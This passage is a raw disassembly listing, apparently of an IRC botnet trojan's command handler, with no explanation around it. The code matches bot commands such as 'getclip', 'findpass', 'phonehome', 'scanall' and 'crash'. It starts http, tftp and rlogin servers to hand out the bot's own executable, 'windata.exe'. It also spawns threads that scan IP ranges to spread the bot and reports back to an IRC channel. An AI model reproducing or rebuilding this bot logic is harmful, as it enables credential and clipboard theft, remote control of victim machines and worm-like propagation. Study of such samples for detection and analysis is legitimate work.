push [ebp+4Ch+var_9C]
push [ebp+4Ch+arg_4]
call sub_40123B
jmp loc_409FDB
; ---------------------------------------------------------------------------
loc_403FC1: ; CODE XREF: sub_40274D+1775�j
push edi
push offset aGetclip ; "getclip"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_4049DC
push edi
push offset aGc ; "gc"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_4049DC
push edi
push offset aFlusharp ; "flusharp"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_4049BF
push edi
push offset aFarp ; "farp"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_4049BF
push edi
push offset aFlushdns ; "flushdns"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_404981
push edi
push offset aFdns ; "fdns"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_404981
push edi
push offset aCurrentip ; "currentip"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_40494B
push edi
push offset aCip ; "cip"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_40494B
push edi
push offset aRloginserver ; "rloginserver"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_404809
push edi
push offset aRlogin ; "rlogin"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_404809
push edi
push offset aHttpserver ; "httpserver"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_40469D
push edi
push offset aHttp ; "http"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_40469D
push edi
push offset aTftpserver ; "tftpserver"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_404575
push edi
push offset aTftp ; "tftp"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_404575
push edi
push offset aCrash ; "crash"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz short loc_40414A
lea eax, [ebp+4Ch+var_2D0]
push offset dword_42F354
push eax
call sub_41E6A6
cmp [ebp+4Ch+var_C], ebx
pop ecx
pop ecx
jnz short loc_404129
push ebx
push [ebp+4Ch+var_4]
lea eax, [ebp+4Ch+var_2D0]
push eax
push [ebp+4Ch+var_9C]
push [ebp+4Ch+arg_4]
call sub_40123B
add esp, 14h
loc_404129: ; CODE XREF: sub_40274D+19C1�j
lea eax, [ebp+4Ch+var_2D0]
push eax
call sub_417D70
mov [esp+10h+var_5C], offset aCrash ; "crash"
push [ebp+esi+4Ch+var_90]
call sub_41E990
jmp loc_40A216
; ---------------------------------------------------------------------------
loc_40414A: ; CODE XREF: sub_40274D+19A9�j
push edi
push offset aScanall ; "scanall"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_404279
push edi
push offset aSa ; "sa"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_404279
push edi
push offset aPhonehome ; "phonehome"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz short loc_4041A1
lea eax, [ebp+4Ch+var_D0]
push eax
push offset aNoticeSPhoning ; "NOTICE %s :PHONING HOME: hi ;).\r\n"
push [ebp+4Ch+arg_4]
call sub_4011F5
loc_404199: ; CODE XREF: sub_40274D+418�j
add esp, 0Ch
jmp loc_402B92
; ---------------------------------------------------------------------------
loc_4041A1: ; CODE XREF: sub_40274D+1A36�j
push edi
push offset aFindpass ; "findpass"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz short loc_4041C7
push edi
push offset aFp ; "fp"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz loc_403F48
loc_4041C7: ; CODE XREF: sub_40274D+1A63�j
push [ebp+4Ch+var_9C]
lea eax, [ebp+4Ch+var_F5C]
push 80h
push eax
call sub_41E6FE
mov eax, [ebp+4Ch+arg_4]
mov [ebp+4Ch+var_F60], eax
mov eax, [ebp+4Ch+var_4]
mov [ebp+4Ch+var_ED8], eax
mov eax, [ebp+4Ch+var_C]
push offset unk_42F2E4
mov [ebp+4Ch+var_ED4], eax
lea eax, [ebp+4Ch+var_2D0]
push 200h
push eax
call sub_41E6FE
push ebx
lea eax, [ebp+4Ch+var_2D0]
push 26h
push eax
call sub_40AE85
add esp, 24h
mov [ebp+4Ch+var_EDC], eax
lea eax, [ebp+4Ch+var_1C]
push eax
push ebx
lea eax, [ebp+4Ch+var_F60]
push eax
push offset byte_419FFD
push ebx
push ebx
call ds:dword_42B03C ; CreateThread
mov ecx, [ebp+4Ch+var_EDC]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4444FC[ecx], eax
jnz short loc_40426C
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
push offset unk_42F2A8
jmp loc_408D01
; ---------------------------------------------------------------------------
loc_404264: ; CODE XREF: sub_40274D+1B25�j
push 32h
call ds:dword_42B014 ; Sleep
loc_40426C: ; CODE XREF: sub_40274D+1B04�j
cmp [ebp+4Ch+var_ED0], ebx
jz short loc_404264
jmp loc_408D10
; ---------------------------------------------------------------------------
loc_404279: ; CODE XREF: sub_40274D+1A0C�j
; sub_40274D+1A21�j
mov al, ds:byte_43DF62
cmp al, bl
mov [ebp+4Ch+var_14], ebx
mov edx, offset byte_43DF62
jz loc_402B92
mov ecx, edx
loc_404290: ; CODE XREF: sub_40274D+1B4B�j
inc [ebp+4Ch+var_14]
add ecx, 0Bh
cmp [ecx], bl
jnz short loc_404290
cmp al, bl
jz loc_402B92
mov [ebp+4Ch+var_20], edx
mov esi, offset aImortal2_0 ; "#imortal2"
loc_4042AA: ; CODE XREF: sub_40274D+1E01�j
push 0Bh
call sub_40B075
pop ecx
mov ecx, eax
mov eax, 190h
cdq
idiv [ebp+4Ch+var_14]
add eax, ecx
cmp eax, 1F4h
jle short loc_4042F6
push ecx
lea eax, [ebp+4Ch+var_2D0]
push offset unk_42F268
push eax
call sub_41E6A6
push ebx
push [ebp+4Ch+var_4]
lea eax, [ebp+4Ch+var_2D0]
push eax
push [ebp+4Ch+var_9C]
push [ebp+4Ch+arg_4]
call sub_40123B
add esp, 20h
jmp loc_404545
; ---------------------------------------------------------------------------
loc_4042F6: ; CODE XREF: sub_40274D+1B77�j
or [ebp+4Ch+var_738], 0FFFFFFFFh
cmp ds:dword_43D880, ebx
mov [ebp+4Ch+var_73C], 64h
mov [ebp+4Ch+var_750], 5
mov [ebp+4Ch+var_74C], 320h
mov [ebp+4Ch+var_14], ebx
jz short loc_404367
mov edi, offset dword_43D880
loc_40432B: ; CODE XREF: sub_40274D+1BFC�j
mov eax, [ebp+4Ch+var_20]
add eax, 0FFFFFFF6h
push eax
lea eax, [edi-28h]
push eax
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz short loc_40434D
inc [ebp+4Ch+var_14]
add edi, 40h
cmp [edi], ebx
jnz short loc_40432B
jmp short loc_404367
; ---------------------------------------------------------------------------
loc_40434D: ; CODE XREF: sub_40274D+1BF2�j
mov eax, [ebp+4Ch+var_14]
mov ecx, eax
shl ecx, 6
mov ecx, ds:dword_43D880[ecx]
mov [ebp+4Ch+var_754], ecx
mov [ebp+4Ch+var_738], eax
loc_404367: ; CODE XREF: sub_40274D+1BD7�j
; sub_40274D+1BFE�j
cmp [ebp+4Ch+var_754], ebx
jz loc_40456B
push 10h
pop edi
lea eax, [ebp+4Ch+var_2E0]
push eax
lea eax, [ebp+4Ch+var_314]
push eax
push [ebp+4Ch+arg_4]
mov [ebp+4Ch+var_2E0], edi
call ds:dword_444068 ; getsockname
mov al, [ebp+4Ch+var_907]
neg al
push edi
sbb eax, eax
and eax, 0FFFF0100h
add eax, 0FFFFh
and [ebp+4Ch+var_310], eax
push [ebp+4Ch+var_310]
call ds:dword_444188 ; inet_ntoa
push eax
lea eax, [ebp+4Ch+var_868]
push eax
call sub_41E860
xor eax, eax
cmp [ebp+4Ch+var_907], bl
push 30h
setnz al
inc eax
inc eax
mov edi, eax
lea eax, [ebp+4Ch+var_868]
push eax
call sub_41EE50
add esp, 14h
cmp edi, ebx
mov byte ptr [ebp+4Ch+arg_0+3], bl
jle short loc_404410
loc_4043EE: ; CODE XREF: sub_40274D+1CC1�j
cmp eax, ebx
jz short loc_404410
mov byte ptr [eax], 78h
lea eax, [ebp+4Ch+var_868]
push 30h
push eax
call sub_41EE50
inc byte ptr [ebp+4Ch+arg_0+3]
pop ecx
pop ecx
movsx ecx, byte ptr [ebp+4Ch+arg_0+3]
cmp ecx, edi
jl short loc_4043EE
loc_404410: ; CODE XREF: sub_40274D+1C9F�j
; sub_40274D+1CA3�j
mov eax, [ebp+4Ch+arg_4]
push [ebp+4Ch+var_9C]
mov [ebp+4Ch+var_758], eax
mov eax, [ebp+4Ch+var_4]
mov [ebp+4Ch+var_730], eax
mov eax, [ebp+4Ch+var_C]
mov [ebp+4Ch+var_72C], eax
mov edi, 80h
lea eax, [ebp+4Ch+var_858]
push edi
push eax
mov [ebp+4Ch+var_728], 1
call sub_41E6FE
push offset byte_42B633
push esi
call sub_41E990
add esp, 14h
test eax, eax
jz short loc_40446F
push esi
lea eax, [ebp+4Ch+var_7D8]
push edi
push eax
call sub_41E6FE
add esp, 0Ch
jmp short loc_404475
; ---------------------------------------------------------------------------
loc_40446F: ; CODE XREF: sub_40274D+1D0D�j
mov [ebp+4Ch+var_7D8], bl
loc_404475: ; CODE XREF: sub_40274D+1D20�j
cmp [ebp+4Ch+var_728], ebx
mov eax, offset aRandom ; "Random"
jnz short loc_404487
mov eax, offset aSequential ; "Sequential"
loc_404487: ; CODE XREF: sub_40274D+1D33�j
push [ebp+4Ch+var_73C]
lea ecx, [ebp+4Ch+var_868]
push [ebp+4Ch+var_74C]
push [ebp+4Ch+var_750]
push [ebp+4Ch+var_754]
push ecx
push eax
lea eax, [ebp+4Ch+var_2D0]
push offset unk_42F1E8
push eax
call sub_41E6A6
push ebx
lea eax, [ebp+4Ch+var_2D0]
push 0Bh
push eax
call sub_40AE85
add esp, 2Ch
mov [ebp+4Ch+var_748], eax
lea eax, [ebp+4Ch+var_1C]
push eax
push ebx
lea eax, [ebp+4Ch+var_868]
push eax
push offset word_40BEFE
push ebx
push ebx
call ds:dword_42B03C ; CreateThread
mov ecx, [ebp+4Ch+var_748]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4444FC[ecx], eax
jnz short loc_404561
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
lea eax, [ebp+4Ch+var_2D0]
push offset unk_42F1AC
push eax
call sub_41E6A6
add esp, 0Ch
loc_40451A: ; CODE XREF: sub_40274D+1E1C�j
cmp [ebp+4Ch+var_C], ebx
jnz short loc_404538
push ebx
push [ebp+4Ch+var_4]
lea eax, [ebp+4Ch+var_2D0]
push eax
push [ebp+4Ch+var_9C]
push [ebp+4Ch+arg_4]
call sub_40123B
add esp, 14h
loc_404538: ; CODE XREF: sub_40274D+1DD0�j
lea eax, [ebp+4Ch+var_2D0]
push eax
call sub_417D70
pop ecx
loc_404545: ; CODE XREF: sub_40274D+1BA4�j
add [ebp+4Ch+var_20], 0Bh
mov eax, [ebp+4Ch+var_20]
cmp [eax], bl
jnz loc_4042AA
jmp loc_402B92
; ---------------------------------------------------------------------------
loc_404559: ; CODE XREF: sub_40274D+1E1A�j
push 32h
call ds:dword_42B014 ; Sleep
loc_404561: ; CODE XREF: sub_40274D+1DB0�j
cmp [ebp+4Ch+var_724], ebx
jz short loc_404559
jmp short loc_40451A
; ---------------------------------------------------------------------------
loc_40456B: ; CODE XREF: sub_40274D+1C20�j
push offset unk_42F174
jmp loc_4078C9
; ---------------------------------------------------------------------------
loc_404575: ; CODE XREF: sub_40274D+197F�j
; sub_40274D+1994�j
push 5
call sub_40B075
test eax, eax
pop ecx
jle short loc_40458B
push offset unk_42F154
jmp loc_4078C9
; ---------------------------------------------------------------------------
loc_40458B: ; CODE XREF: sub_40274D+1E32�j
mov eax, [ebp+esi+4Ch+var_A0]
cmp eax, ebx
mov edi, 104h
jz short loc_4045AB
push eax
lea eax, [ebp+4Ch+var_2D58]
push edi
push eax
call sub_41E6FE
add esp, 0Ch
jmp short loc_4045BA
; ---------------------------------------------------------------------------
loc_4045AB: ; CODE XREF: sub_40274D+1E49�j
push edi
lea eax, [ebp+4Ch+var_2D58]
push eax
push ebx
call ds:dword_42B00C ; GetModuleFileNameA
loc_4045BA: ; CODE XREF: sub_40274D+1E5C�j
mov esi, [ebp+esi+4Ch+var_9C]
cmp esi, ebx
jnz short loc_4045C7
mov esi, offset aWindata_exe ; "windata.exe"
loc_4045C7: ; CODE XREF: sub_40274D+1E73�j
push esi
lea eax, [ebp+4Ch+var_2C54]
push edi
push eax
call sub_41E6FE
mov eax, ds:dword_43C074
mov [ebp+4Ch+var_2B48], eax
mov eax, [ebp+4Ch+arg_4]
push 7Fh
push [ebp+4Ch+var_9C]
mov [ebp+4Ch+var_2D5C], eax
lea eax, [ebp+4Ch+var_2B44]
push eax
mov [ebp+4Ch+var_2B4C], ebx
call sub_41E860
mov eax, [ebp+4Ch+var_4]
mov [ebp+4Ch+var_2AC4], eax
mov eax, [ebp+4Ch+var_C]
mov [ebp+4Ch+var_2AC0], eax
lea eax, [ebp+4Ch+var_2D58]
push eax
push [ebp+4Ch+var_2B48]
lea eax, [ebp+4Ch+var_2D0]
push offset unk_42F120
push eax
call sub_41E6A6
push ebx
lea eax, [ebp+4Ch+var_2D0]
push 5
push eax
call sub_40AE85
add esp, 34h
mov [ebp+4Ch+var_2B50], eax
lea eax, [ebp+4Ch+var_1C]
push eax
push ebx
lea eax, [ebp+4Ch+var_2D5C]
push eax
push offset aUnlMb ; "Ul$Γ|\b"
push ebx
push ebx
call ds:dword_42B03C ; CreateThread
mov ecx, [ebp+4Ch+var_2B50]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4444FC[ecx], eax
jnz short loc_404690
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
push offset unk_42F0E4
jmp loc_40697E
; ---------------------------------------------------------------------------
loc_404688: ; CODE XREF: sub_40274D+1F49�j
push 32h
call ds:dword_42B014 ; Sleep
loc_404690: ; CODE XREF: sub_40274D+1F28�j
cmp [ebp+4Ch+var_2ABC], ebx
jz short loc_404688
jmp loc_40698D
; ---------------------------------------------------------------------------
loc_40469D: ; CODE XREF: sub_40274D+1955�j
; sub_40274D+196A�j
mov edi, [ebp+esi+4Ch+var_A0]
cmp edi, ebx
jz short loc_4046B9
push edi
call sub_41E7AD
test eax, eax
pop ecx
jz short loc_4046B9
push edi
call sub_41E7AD
pop ecx
jmp short loc_4046BE
; ---------------------------------------------------------------------------
loc_4046B9: ; CODE XREF: sub_40274D+1F56�j
; sub_40274D+1F61�j
mov eax, ds:dword_43C078
loc_4046BE: ; CODE XREF: sub_40274D+1F6A�j
mov esi, [ebp+esi+4Ch+var_9C]
mov [ebp+4Ch+var_36D0], eax
xor eax, eax
cmp [ebp+4Ch+var_904], bl
setz al
cmp esi, ebx
mov [ebp+4Ch+var_36BC], eax
jz short loc_4046EE
lea eax, [ebp+4Ch+var_37D4]
push esi
push eax
call sub_41E6A6
pop ecx
pop ecx
jmp short loc_404719
; ---------------------------------------------------------------------------
loc_4046EE: ; CODE XREF: sub_40274D+1F8E�j
push 104h
lea eax, [ebp+4Ch+var_4FFC]
push eax
call ds:dword_42B010 ; GetSystemDirectoryA
push ebx
push ebx
push ebx
lea eax, [ebp+4Ch+var_4D0]
push eax
lea eax, [ebp+4Ch+var_4FFC]
push eax
call sub_41ED01
add esp, 14h
loc_404719: ; CODE XREF: sub_40274D+1F9F�j
lea eax, [ebp+4Ch+var_37D4]
push eax
call sub_41E1C0
cmp [ebp+eax+4Ch+var_37D5], 5Ch
pop ecx
jnz short loc_404744
lea eax, [ebp+4Ch+var_37D4]
push eax
call sub_41E1C0
pop ecx
mov [ebp+eax+4Ch+var_37D5], bl
loc_404744: ; CODE XREF: sub_40274D+1FE1�j
push [ebp+4Ch+var_9C]
mov esi, [ebp+4Ch+arg_4]
lea eax, [ebp+4Ch+var_3A5C]
push 80h
push eax
mov [ebp+4Ch+var_3A60], esi
call sub_41E6FE
mov eax, [ebp+4Ch+var_C]
mov edi, [ebp+4Ch+var_4]
add esp, 0Ch
mov [ebp+4Ch+var_36C0], eax
lea eax, [ebp+4Ch+var_37D4]
push eax
push [ebp+4Ch+var_36D0]
mov [ebp+4Ch+var_36C4], edi
push esi
call sub_4023C9
pop ecx
push eax
lea eax, [ebp+4Ch+var_2D0]
push offset unk_42F0A8
push eax
call sub_41E6A6
push ebx
lea eax, [ebp+4Ch+var_2D0]
push 3
push eax
call sub_40AE85
add esp, 20h
mov [ebp+4Ch+var_36C8], eax
lea eax, [ebp+4Ch+var_1C]
push eax
push ebx
lea eax, [ebp+4Ch+var_3A60]
push eax
push offset byte_412DD9
push ebx
push ebx
call ds:dword_42B03C ; CreateThread
mov ecx, [ebp+4Ch+var_36C8]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4444FC[ecx], eax
jnz short loc_4047FC
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
push offset unk_42F06C
jmp loc_40491A
; ---------------------------------------------------------------------------
loc_4047F4: ; CODE XREF: sub_40274D+20B5�j
push 32h
call ds:dword_42B014 ; Sleep
loc_4047FC: ; CODE XREF: sub_40274D+2094�j
cmp [ebp+4Ch+var_36B4], ebx
jz short loc_4047F4
jmp loc_404929
; ---------------------------------------------------------------------------
loc_404809: ; CODE XREF: sub_40274D+192B�j
; sub_40274D+1940�j
mov edi, [ebp+esi+4Ch+var_A0]
cmp edi, ebx
jz short loc_404825
push edi
call sub_41E7AD
test eax, eax
pop ecx
jz short loc_404825
push edi
call sub_41E7AD
pop ecx
jmp short loc_40482A
; ---------------------------------------------------------------------------
loc_404825: ; CODE XREF: sub_40274D+20C2�j
; sub_40274D+20CD�j
mov eax, ds:dword_43C07C
loc_40482A: ; CODE XREF: sub_40274D+20D6�j
mov [ebp+4Ch+var_182C], eax
mov eax, [ebp+esi+4Ch+var_9C]
cmp eax, ebx
jnz short loc_40483E
lea eax, [ebp+4Ch+var_D0]
loc_40483E: ; CODE XREF: sub_40274D+20E9�j
push eax
lea eax, [ebp+4Ch+var_196C]
push 40h
push eax
call sub_41E6FE
mov esi, [ebp+esi+4Ch+var_98]
add esp, 0Ch
cmp esi, ebx
jnz short loc_40485D
mov esi, offset byte_42B633
loc_40485D: ; CODE XREF: sub_40274D+2109�j
push esi
lea eax, [ebp+4Ch+var_192C]
push 100h
push eax
call sub_41E6FE
push [ebp+4Ch+var_9C]
lea eax, [ebp+4Ch+var_19EC]
push 80h
push eax
call sub_41E6FE
mov eax, [ebp+4Ch+var_C]
mov esi, [ebp+4Ch+arg_4]
mov edi, [ebp+4Ch+var_4]
add esp, 18h
mov [ebp+4Ch+var_1818], eax
lea eax, [ebp+4Ch+var_196C]
push eax
push [ebp+4Ch+var_182C]
mov [ebp+4Ch+var_19F0], esi
push esi
mov [ebp+4Ch+var_181C], edi
call sub_4023C9
pop ecx
push eax
lea eax, [ebp+4Ch+var_2D0]
push offset unk_42F030
push eax
call sub_41E6A6
push ebx
lea eax, [ebp+4Ch+var_2D0]
push 9
push eax
call sub_40AE85
add esp, 20h
mov [ebp+4Ch+var_1828], eax
lea eax, [ebp+4Ch+var_1C]
push eax
push ebx
lea eax, [ebp+4Ch+var_19F0]
push eax
push offset byte_413A51
push ebx
push ebx
call ds:dword_42B03C ; CreateThread
mov ecx, [ebp+4Ch+var_1828]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4444FC[ecx], eax
jnz short loc_404941
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
push offset unk_42EFF4
loc_40491A: ; CODE XREF: sub_40274D+20A2�j
; sub_40274D+4A78�j ...
lea eax, [ebp+4Ch+var_2D0]
push eax
call sub_41E6A6
add esp, 0Ch
loc_404929: ; CODE XREF: sub_40274D+20B7�j
; sub_40274D+21FC�j ...
cmp [ebp+4Ch+var_C], ebx
jnz loc_408D10
push ebx
push edi
jmp loc_4089CD
; ---------------------------------------------------------------------------
loc_404939: ; CODE XREF: sub_40274D+21FA�j
push 32h
call ds:dword_42B014 ; Sleep
loc_404941: ; CODE XREF: sub_40274D+21BF�j
cmp [ebp+4Ch+var_1814], ebx
jz short loc_404939
jmp short loc_404929
; ---------------------------------------------------------------------------
loc_40494B: ; CODE XREF: sub_40274D+1901�j
; sub_40274D+1916�j
mov esi, [ebp+esi+4Ch+var_A0]
cmp esi, ebx
jz short loc_40495B
push esi
call sub_41E7AD
jmp short loc_404962
; ---------------------------------------------------------------------------
loc_40495B: ; CODE XREF: sub_40274D+2204�j
push 0Bh
call sub_40B094
loc_404962: ; CODE XREF: sub_40274D+220C�j
cmp eax, ebx
pop ecx
jz short loc_404979
push eax
push [ebp+4Ch+var_4]
push [ebp+4Ch+var_9C]
push [ebp+4Ch+arg_4]
call sub_40B619
loc_404976: ; CODE XREF: sub_40274D+26CB�j
add esp, 10h
loc_404979: ; CODE XREF: sub_40274D+5C8�j
; sub_40274D+5D4�j ...
mov eax, [ebp+4Ch+arg_24]
jmp loc_402B95
; ---------------------------------------------------------------------------
loc_404981: ; CODE XREF: sub_40274D+18D7�j
; sub_40274D+18EC�j
mov eax, ds:dword_4441F0
cmp eax, ebx
jz short loc_4049A4
call eax ; DnsFlushResolverCache
test eax, eax
lea eax, [ebp+4Ch+var_2D0]
jz short loc_40499D
push offset unk_42EFD0
jmp short loc_4049AF
; ---------------------------------------------------------------------------
loc_40499D: ; CODE XREF: sub_40274D+2247�j
push offset unk_42EFA4
jmp short loc_4049AF
; ---------------------------------------------------------------------------
loc_4049A4: ; CODE XREF: sub_40274D+223B�j
push offset unk_42EF78
lea eax, [ebp+4Ch+var_2D0]
loc_4049AF: ; CODE XREF: sub_40274D+224E�j
; sub_40274D+2255�j ...
push 200h
push eax
call sub_41E6FE
jmp loc_4076E0
; ---------------------------------------------------------------------------
loc_4049BF: ; CODE XREF: sub_40274D+18AD�j
; sub_40274D+18C2�j
call sub_4022F5
test eax, eax
lea eax, [ebp+4Ch+var_2D0]
jz short loc_4049D5
push offset unk_42EF54
jmp short loc_4049AF
; ---------------------------------------------------------------------------
loc_4049D5: ; CODE XREF: sub_40274D+227F�j
push offset unk_42EF28
jmp short loc_4049AF
; ---------------------------------------------------------------------------
loc_4049DC: ; CODE XREF: sub_40274D+1883�j
; sub_40274D+1898�j
cmp [ebp+4Ch+var_C], ebx
jnz short loc_4049F8
push ebx
push [ebp+4Ch+var_4]
push offset dword_42EF10
push [ebp+4Ch+var_9C]
push [ebp+4Ch+arg_4]
call sub_40123B
add esp, 14h
loc_4049F8: ; CODE XREF: sub_40274D+2292�j
push ebx
push [ebp+4Ch+var_4]
call sub_41AD5A
push eax
push [ebp+4Ch+var_9C]
push [ebp+4Ch+arg_4]
call sub_40123B
push offset dword_42EEF4
loc_404A12: ; CODE XREF: sub_40274D+257D�j
; sub_40274D+25AC�j
call sub_417D70
jmp loc_409FB6
; ---------------------------------------------------------------------------
loc_404A1C: ; CODE XREF: sub_40274D+1725�j
; sub_40274D+173A�j
push 0Ah
call sub_40B075
test eax, eax
pop ecx
jle short loc_404A2F
push offset unk_42EEC8
jmp short loc_404A4D
; ---------------------------------------------------------------------------
loc_404A2F: ; CODE XREF: sub_40274D+22D9�j
push [ebp+4Ch+var_9C]
push [ebp+4Ch+arg_4]
call sub_41C9D4
cmp eax, 0FFFFFFFFh
pop ecx
pop ecx
jnz short loc_404A48
push offset unk_42EEA0
jmp short loc_404A4D
; ---------------------------------------------------------------------------
loc_404A48: ; CODE XREF: sub_40274D+22F2�j
push offset unk_42EE80
loc_404A4D: ; CODE XREF: sub_40274D+22E0�j
; sub_40274D+22F9�j ...
lea eax, [ebp+4Ch+var_2D0]
push eax
call sub_41E6A6
pop ecx
pop ecx
loc_404A5B: ; CODE XREF: sub_40274D+5574�j
; sub_40274D+6E4D�j
cmp [ebp+4Ch+var_C], ebx
jnz short loc_404A79
push ebx
push [ebp+4Ch+var_4]
lea eax, [ebp+4Ch+var_2D0]
push eax
push [ebp+4Ch+var_9C]
push [ebp+4Ch+arg_4]
loc_404A71: ; CODE XREF: sub_40274D+6ADF�j
call sub_40123B
add esp, 14h
loc_404A79: ; CODE XREF: sub_40274D+2311�j
; sub_40274D+2508�j ...
lea eax, [ebp+4Ch+var_2D0]
push eax
call sub_417D70
jmp loc_40A217
; ---------------------------------------------------------------------------
loc_404A8A: ; CODE XREF: sub_40274D+16FB�j
; sub_40274D+1710�j
push [ebp+4Ch+var_C]
push [ebp+4Ch+var_4]
push [ebp+4Ch+var_9C]
push [ebp+4Ch+arg_4]
call sub_401F92
jmp loc_404D0F
; ---------------------------------------------------------------------------
loc_404AA0: ; CODE XREF: sub_40274D+16D1�j
; sub_40274D+16E6�j
push [ebp+esi+4Ch+var_A0]
push [ebp+4Ch+var_4]
push [ebp+4Ch+var_9C]
push [ebp+4Ch+arg_4]
call sub_419725
jmp loc_404D0F
; ---------------------------------------------------------------------------
loc_404AB7: ; CODE XREF: sub_40274D+16A7�j
; sub_40274D+16BC�j
or edi, 0FFFFFFFFh
call ds:dword_42B038 ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
mov esi, [ebp+esi+4Ch+var_A0]
cmp esi, ebx
mov [ebp+4Ch+arg_0], eax
jz short loc_404ADD
push esi
call sub_41E7AD
pop ecx
mov edi, eax
loc_404ADD: ; CODE XREF: sub_40274D+2385�j
mov eax, [ebp+4Ch+arg_0]
xor edx, edx
mov ecx, 15180h
div ecx
cmp eax, edi
jnb short loc_404AF6
cmp edi, 0FFFFFFFFh
jnz loc_404979
loc_404AF6: ; CODE XREF: sub_40274D+239E�j
push ebx
call sub_41D5F8
push eax
lea eax, [ebp+4Ch+var_2D0]
push offset dword_42EE68
push eax
call sub_41E6A6
push ebx
push [ebp+4Ch+var_4]
lea eax, [ebp+4Ch+var_2D0]
push eax
push [ebp+4Ch+var_9C]
push [ebp+4Ch+arg_4]
call sub_40123B
lea eax, [ebp+4Ch+var_2D0]
push eax
call sub_417D70
jmp loc_4083EA
; ---------------------------------------------------------------------------
loc_404B35: ; CODE XREF: sub_40274D+167D�j
; sub_40274D+1692�j
push [ebp+4Ch+var_4]
push [ebp+4Ch+var_9C]
push [ebp+4Ch+arg_4]
call sub_4185EA
lea eax, [ebp+4Ch+var_2D0]
push offset dword_42EE48
push eax
call sub_41E6A6
jmp loc_408BF5
; ---------------------------------------------------------------------------
loc_404B59: ; CODE XREF: sub_40274D+1653�j
; sub_40274D+1668�j
push 27h
call sub_40B075
test eax, eax
pop ecx
jle short loc_404B87
cmp [ebp+4Ch+var_C], ebx
jnz loc_402B92
push ebx
push [ebp+4Ch+var_4]
push offset unk_42EE28
push [ebp+4Ch+var_9C]
push [ebp+4Ch+arg_4]
call sub_40123B
jmp loc_4095B1
; ---------------------------------------------------------------------------
loc_404B87: ; CODE XREF: sub_40274D+2416�j
push [ebp+4Ch+var_9C]
lea eax, [ebp+4Ch+var_BCC]
push 80h
push eax
call sub_41E6FE
mov eax, [ebp+4Ch+arg_4]
mov esi, [ebp+esi+4Ch+var_A0]
mov [ebp+4Ch+var_BD0], eax
mov eax, [ebp+4Ch+var_4]
mov [ebp+4Ch+var_B44], eax
mov eax, [ebp+4Ch+var_C]
add esp, 0Ch
cmp esi, ebx
mov [ebp+4Ch+var_B40], eax
mov [ebp+4Ch+var_B48], ebx
jz short loc_404BE2
push esi
push offset aFull ; "full"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz short loc_404BE2
mov [ebp+4Ch+var_B48], 1
loc_404BE2: ; CODE XREF: sub_40274D+2478�j
; sub_40274D+2489�j
lea eax, [ebp+4Ch+var_2D0]
push offset dword_42EE04
push eax
call sub_41E6A6
push ebx
lea eax, [ebp+4Ch+var_2D0]
push 27h
push eax
call sub_40AE85
add esp, 14h
mov [ebp+4Ch+var_B4C], eax
lea eax, [ebp+4Ch+var_1C]
push eax
push ebx
lea eax, [ebp+4Ch+var_BD0]
push eax
push offset dword_41C66C
push ebx
push ebx
call ds:dword_42B03C ; CreateThread
mov ecx, [ebp+4Ch+var_B4C]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4444FC[ecx], eax
jnz short loc_404C62
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
lea eax, [ebp+4Ch+var_2D0]
push offset unk_42EDC8
push eax
call sub_41E6A6
add esp, 0Ch
jmp loc_404A79
; ---------------------------------------------------------------------------
loc_404C5A: ; CODE XREF: sub_40274D+251B�j
push 32h
call ds:dword_42B014 ; Sleep
loc_404C62: ; CODE XREF: sub_40274D+24EB�j
cmp [ebp+4Ch+var_B3C], ebx
jz short loc_404C5A
jmp loc_404A79
; ---------------------------------------------------------------------------
loc_404C6F: ; CODE XREF: sub_40274D+1629�j
; sub_40274D+163E�j
cmp [ebp+4Ch+var_C], ebx
jnz short loc_404C8B
push ebx
push [ebp+4Ch+var_4]
push offset dword_42EDAC
push [ebp+4Ch+var_9C]
push [ebp+4Ch+arg_4]
call sub_40123B
add esp, 14h
loc_404C8B: ; CODE XREF: sub_40274D+2525�j
push [ebp+4Ch+arg_4]
call ds:dword_444218 ; closesocket
call ds:dword_444224 ; WSACleanup
call sub_41AEDD
jmp loc_405462
; ---------------------------------------------------------------------------
loc_404CA4: ; CODE XREF: sub_40274D+15FF�j
; sub_40274D+1614�j
push ebx
push [ebp+4Ch+var_4]
lea eax, [ebp+4Ch+var_2D0]
push [ebp+4Ch+arg_4]
push eax
call sub_41D779
pop ecx
pop ecx
push eax
push [ebp+4Ch+var_9C]
push [ebp+4Ch+arg_4]
call sub_40123B
push offset dword_42ED90
jmp loc_404A12
; ---------------------------------------------------------------------------
loc_404CCF: ; CODE XREF: sub_40274D+15D5�j
; sub_40274D+15EA�j
push ebx
push [ebp+4Ch+var_4]
